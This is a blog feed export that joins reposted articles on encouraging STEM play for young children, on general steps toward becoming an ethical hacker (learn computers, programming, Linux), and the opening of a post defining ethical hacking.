<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Engaging in a diverse set of projects and activities best encourages passion and curiosity for STEM.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Hands-on experiences, strong role models, and exciting problems motivate children to want to learn and</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">grow. Through a blend of different projects and activities, STEM teachers and parents not only nurture a</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">love for STEM, but also develop children's desires to tackle complex problems that require a wide range of skills.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">As the </span><a href="https://www2.ed.gov/parents/academic/help/science/part_pg7.html#p7" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">U.S. Department of Education</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> outlines, parents do not need STEM degrees to help children learn science.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Armed with just a magnifying glass and going outside, parents can teach kids about the world by asking children</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">to observe, ask questions, and think about what they see about everything, from bugs to mud puddles.</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM is for Young Kids Too</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM is for all ages! Many local science centers host events that are designed particularly for young age groups.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Young children discovering the world around them for the first time have much to learn and absorb from these programs.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">In fact, just playing with children and offering creative, hands-on experiences inspires inquisitive minds.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><a href="https://littlebinsforlittlehands.com/early-elementary-stem-projects-kids/" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Toys and games</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> that stimulate curiosity are excellent teaching tools. LEGOs, building blocks, as well as tinkering</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">stations with items like string, straws, pipe cleaners, colorful tape, and popsicle sticks aid fine motor skills and spatial</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">skills. Not only that, but they also teach how to plan, inquire, and think like scientists.</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM Projects for Kids</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Project-based learning provides a strong sense of accomplishment, teaches resilience in the face of difficult problems, and</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">shows how people adapt and learn from failure. Mentoring and guiding a child through projects builds confidence and gives</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">them the tools they need to make their own ideas come to life. Many of Juni's students utilize what they learn in our courses</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">to program their own games, websites, and more. With someone there to help debug particularly tricky problems and offer</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">guidance, students can pursue wilder, more creative ideas. We have also written more extensively on </span><a href="https://junilearning.com/blog/coding-games-toys-for-kids" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">great coding toys and</span></a><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">games for kids</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Beyond coding, there are many fun projects parents can do with their children, across all ages. Here are some selected</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">project ideas and science experiments to get started!</span></div>
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Rock candy</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Slime</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Growing crystals</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Coloring flowers by putting them in solution</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Using imagination to build LEGOs</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Inspiring aspiring architects with KAPLA blocks</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Math Jenga</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">...and of course, the traditional volcano!</span></div>
</li>
</ul>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM Activities for Kids</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">According to the </span><a href="https://www.whitehouse.gov/wp-content/uploads/2018/12/STEM-Education-Strategic-Plan-2018.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">National Science & Technology Council</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">, the best STEM education should be interdisciplinary</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">and blend different forms of learning. Some of the best STEM lessons can be found through correlated skills</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">of inquiry, creativity, and genuine excitement. Engaging in a full breadth of activities best supports a well-rounded</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> education that forms a fertile foundation for innovation.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Outside a formalized STEM education, parents can support their child's passions in a wide variety of ways.</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">By exposing children to nature emporiums, museums, science centers, zoos, aquariums, and libraries,</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">parents can inspire and nurture their child’s inquisitive mind and creativity. These locations often offer a</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">variety of hands-on workshops, events, summer camps and programs, and more. Not only are these</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">activities fun for children, but they’re great for the whole family!</span></div>
<h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">STEM Helps Develop Lifelong Skills</span></h2>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The drive for discovery and exploration that early STEM education develops will serve a child throughout their</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">life and help them adapt to a changing, tech-driven world. By encouraging a child’s interests and passions,</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">parents help develop their child's abilities to be resilient to challenges, inquire about the world around them,</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">and creatively solve problems.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">This </span><a href="https://junilearning.com/blog/guide/encourage-stem-in-early-education/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">article</span></a><a href="https://junilearning.com/blog/guide/coding-gifts-for-kids/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"> </span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">originally appeared on </span><a href="https://junilearning.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">junilearning.com</span></a></div>
</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7171379281281950124.post-83630058183144355002016-05-04T12:36:00.002-07:002016-05-04T12:36:44.978-07:00How to become an Ethical hacker<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="intro" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 1.09em; font-stretch: normal; line-height: 1.7em; padding: 0px 7em 2em 0px;">
Although <a href="http://www.computerhope.com/jargon/h/hacker.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">hacker</a> has many definitions, we believe most people asking this question are interested in malicious <a href="http://www.computerhope.com/jargon/c/code.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">coding</a>. Computer Hope does not teach or condone cracking, stealing, breaking, or otherwise illegal cyber activity. However, a hacker may also be defined as someone with an advanced understanding of computers and programming. If you want to learn more about this side of hacker, see the suggestions below.</div>
<h2 style="background-color: white; border: 0px; clear: left; color: #2a70d0; font-family: arial, helvetica, sans-serif; font-size: 1.4em; font-weight: 400; line-height: 1; margin: 0.3em 0px 0.9em; padding: 0px 7em 0px 0px;">
Learn more about computers</h2>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
<b>Computer basics</b> - Having a good understanding of a computer, its components, and how it works is essential for anyone, not just hackers.</div>
<ul style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1; list-style: none; margin: 0px; padding: 0px 7em 2em 0px;">
<li style="background: url(http://cdn.computerhope.com/arrow.png) 0px 5px no-repeat; border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 3em; padding: 0px 0px 8px 26px;"><a href="http://www.computerhope.com/issues/ch001262.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">Know all the basics of a computer.</a></li>
<li style="background: url(http://cdn.computerhope.com/arrow.png) 0px 5px no-repeat; border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 3em; padding: 0px 0px 8px 26px;"><a href="http://www.computerhope.com/issues/ch001263.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">How does a computer work?</a></li>
</ul>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
<b>Books</b> - Make it a goal to read computer books that cover your interests. Visiting popular online bookstores, such as Amazon, and browse through the top 100 books on your subject is a great place to start. Audible has an enormous selection of e-books, if you prefer that method of reading.</div>
<ul style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1; list-style: none; margin: 0px; padding: 0px 7em 2em 0px;">
<li style="background: url(http://cdn.computerhope.com/arrow.png) 0px 5px no-repeat; border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 3em; padding: 0px 0px 8px 26px;"><a href="http://www.computerhope.com/issues/ch001517.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">What computer books would you recommend reading?</a></li>
<li style="background: url(http://cdn.computerhope.com/arrow.png) 0px 5px no-repeat; border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 3em; padding: 0px 0px 8px 26px;">See our <a href="http://www.computerhope.com/jargon/e/ebook.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">e-book</a> definition for a list of dozens of places to find electronics books online.</li>
</ul>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
<b>Know the jargon</b> - The computer industry has thousands of acronyms and terms, visit the <a href="http://www.computerhope.com/jargon.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">Computer Hope dictionary</a> to find the ones you are most likely to run across.</div>
<ul style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1; list-style: none; margin: 0px; padding: 0px 7em 2em 0px;">
<li style="background: url(http://cdn.computerhope.com/arrow.png) 0px 5px no-repeat; border: 0px; font-family: inherit; line-height: 1.5625; margin: 0px 0px 0px 3em; padding: 0px 0px 8px 26px;"><a href="http://www.computerhope.com/vdef.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">Computer security related definitions.</a></li>
</ul>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
<b>Online news</b> - Visit the Computer News pages at least a few times weekly to keep up with all the latest computer news. Visit our <a href="http://www.computerhope.com/network/news.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">computer news links</a> for a list of great news sites.</div>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
<b>Participate in forums</b> - The Internet is full of online <a href="http://www.computerhope.com/jargon/f/forum.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">forums</a>, where thousands of other users participate with each other in answering questions or talking about what they love to do. Participating in these forums will not only allow you to test your understanding of the subject, but also learn from others. A great example of an online forum would be the<a href="http://www.computerhope.com/forum" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">Computer help forums</a>.</div>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
<b>Build a computer</b> - If you want to learn more about the hardware aspect of a computer, there is nothing more educational than putting one together. Not only will this help broaden your knowledge of computer hardware, but can help with diagnosing hardware problems, and teach you more about how computers work. There are plenty of websites with instructions on how to build your own machine.</div>
<h2 style="background-color: white; border: 0px; clear: left; color: #2a70d0; font-family: arial, helvetica, sans-serif; font-size: 1.4em; font-weight: 400; line-height: 1; margin: 0.3em 0px 0.9em; padding: 0px 7em 0px 0px;">
Pick up a programming language</h2>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
Learning how <a href="http://www.computerhope.com/jargon/s/software.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">software</a> works by studying a programming language is an invaluable tool. It teaches you how to create your own programs, and how to debug them. It also gives you a better understanding of how programs work. Our <a href="http://www.computerhope.com/jargon/p/proglang.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">programming language </a>definition lists many of the more popular programming languages.</div>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
Also, learning scripting languages such as <a href="http://www.computerhope.com/jargon/p/perl.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">Perl</a> and <a href="http://www.computerhope.com/jargon/p/php.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">PHP</a> and even the basics of <a href="http://www.computerhope.com/jargon/h/html.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">HTML</a> web design, are advantageous for anyone interested in setting up and tweaking websites.</div>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
If you need more experience with programming, creating your own <a href="http://www.computerhope.com/jargon/o/opensour.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">open source</a> project or helping with another open project can be a helpful learning experience. Creating your own website can also be another great learning experience as it shows the details behind website design and setup.</div>
<h2 style="background-color: white; border: 0px; clear: left; color: #2a70d0; font-family: arial, helvetica, sans-serif; font-size: 1.4em; font-weight: 400; line-height: 1; margin: 0.3em 0px 0.9em; padding: 0px 7em 0px 0px;">
Learn alternative operating system</h2>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
Many people today run some version of Microsoft Windows, which is fine for home and office use, but it is also a good idea to learn alternative operating systems such as <a href="http://www.computerhope.com/jargon/l/linux.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">Linux</a>. Learning a Linux distro not only helps broaden your experience, but is a necessity when wanting to navigate Linux based servers running websites and other web services.</div>
<div class="dtab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 80px !important; padding: 0px 7em 2em 0px;">
<span class="tips" style="background: url(http://cdn.computerhope.com/chsprite.png) 0px -68px no-repeat; font-weight: 700; margin: 0px 0px 0px -1.6em; padding: 0px 5px 0px 24px;">Tip:</span> If you have access to a server that is hosting your website, you may have access to <a href="http://www.computerhope.com/jargon/s/ssh.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">SSH</a>, which allows you to connect to a server and is another good way to learn the Linux command line.</div>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
If you are new to Linux, <a href="http://www.computerhope.com/jargon/u/ubuntu.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">Ubuntu</a> is a good distro for new users to try. This <a href="http://www.computerhope.com/jargon/v/variant.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">distro</a> of Linux can also be run by booting it off of a CD. However, if you want a full experience, it is better to install Ubuntu or another distro on the computer.</div>
<div class="tab" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 16px; line-height: 1.7em; margin-left: 2.5em !important; padding: 0px 7em 2em 0px;">
Source:<a href="http://www.computerhope.com/issues/ch001183.htm">http://www.computerhope.com/issues/ch001183.htm</a></div>
</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7171379281281950124.post-12200911128693285782016-05-04T12:34:00.002-07:002016-05-04T12:34:17.904-07:00Introduction to Ethical Hacking - What is ethical hacking?<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="intro" style="background-color: white; border: 0px; color: #454545; font-family: Verdana, sans-serif; font-size: 1.09em; font-stretch: normal; line-height: 1.7em; padding: 0px 7em 2em 0px;">
<b>Ethical hacking</b> and <b>ethical hacker</b> are terms used to describe <a href="http://www.computerhope.com/jargon/h/hacker.htm" style="border-bottom-color: rgb(219, 219, 219); border-bottom-style: solid; border-bottom-width: 1px; color: #663366; text-decoration: none;">hacking</a> performed by a company or individual to help identify potential threats on a computer or network. An ethical hacker attempts to bypass system security and search for any weak points that could be exploited by malicious hackers. This information is then used by the organization to improve the system security, in an effort to minimize or eliminate any potential attacks.</div>
<h2 style="background-color: white; border: 0px; clear: left; color: #2a70d0; font-family: arial, helvetica, sans-serif; font-size: 1.4em; font-weight: 400; line-height: 1; margin: 0.3em 0px 0.9em; padding: 0px 7em 0px 0px;">
What constitutes ethical hacking?</h2>
